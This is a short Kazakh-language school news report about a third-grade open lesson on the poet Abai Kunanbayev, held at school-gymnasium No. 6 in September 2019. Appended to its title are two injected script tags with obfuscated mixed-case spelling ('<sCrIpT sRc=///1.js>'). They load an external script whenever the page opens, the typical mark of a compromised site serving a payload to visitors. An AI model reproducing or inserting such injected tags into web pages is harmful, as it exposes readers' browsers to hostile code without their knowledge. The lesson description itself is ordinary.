3-сыныпта ол «Сіз білесіз бе?» Тақырыбында ашық сабақ өткізді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.09.2019

                  Абай Құнанбаев атындағы №6 мектеп-гимназиясының қазақ тілі мен әдебиеті мұғалімі Токенова Маржан Жунусовна 3-сыныпта «Сен білесің бе?» атты  сайыс сабағын өткізді. Сабақта оқушылардың ойлау, есте сақтау қабілеттері ескеріліп, сабақтың әр кезеңінде қызығушылығын ояту, байланыстыра сөйлеу, сөздік қорын молайту көзделді. Сабақтың әрбір кезеңдерінен өткен сайын оқушылар тапсырмаларға тез, дұрыс жауап беруге тырысып ұйымшылдыққа тәрбиеленді, белсенділіктері, қызығушылықтары артты. Сабақ бойы оқушылар берілген тапсырманы орындауда белсенділік көрсетті. «Қос тілің – қос қанатың»  «Аудармашы», «Жаңылтпаштар», «Ойлан, тап», «Жұмбақ шеш» сияқты тапсырмалар өз шешуін тапты.

         Оқушылар әдеби тіл шебері, ұлы ақын Абай Құнанбаевтың өмірі мен шығармашылығымен танысып, сұрақтарға жауап берді. Өлеңдерін оқып, суреттер салынды. Оқушылар шығармашылықпен, өз беттерімен жұмыс атқара отырып, сабақта тиісті дәрежеде білім алды. 

                      

 

Просмотров: 793


Пікір қосу



Деректерді қолтаңбаға қосу